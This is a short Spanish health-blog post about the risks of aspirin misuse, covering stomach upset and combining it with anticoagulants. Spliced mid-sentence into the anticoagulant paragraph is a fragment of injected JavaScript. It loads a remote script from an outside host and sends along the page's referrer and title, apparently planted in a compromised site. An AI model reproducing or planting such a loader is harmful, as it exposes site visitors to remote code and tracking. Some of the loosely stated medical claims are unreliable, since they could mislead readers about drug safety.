Salud y belleza » Medicina

La otra aspirina (II)

Sin Comentarios

El problema no es la aspirina. De hecho, la aspirina es perfecta. Aquí, y siempre, el problema es el hombre. Efectivamente, el ser humano siempre tiende a modificar el término uso, agregarle algunas letras al signo, y terminar conformando otro: abuso.

En esta segunda parte del repaso útil en torno al ADN de la aspirina, presentamos más problema que, en exceso, puede causar éste tipo de elemento.

Al fin y al cabo, absolutamente todas las cosas de éste mundo poseen un costado peligroso: hasta el sexo. ¿Por qué no iba a tener un lado B la aspirina, entonces?

Genera problemas estomacales

Si bien puede que sea una cuestión lógica, no está de más en la lista: consumir aspirina de forma habitual puede causar dolores de estomago y, en algunos casos, hasta leves intoxicaciones (especialmente cuando se mezcla con otras sustancias: cafeína, coca cola, etc.).

Mal combinada puede ser mortal en deportistas

¿Cómo? Sencillo: si ya se está tomando medicamentos que previenen la coagulación de la sangre, es necesario no incorporar aspirina. Sucede que si se potencian esos efectos, se puede poner en riesgo la integridad física.s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + ''; }

Más consejos de salud y belleza : , , ,

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.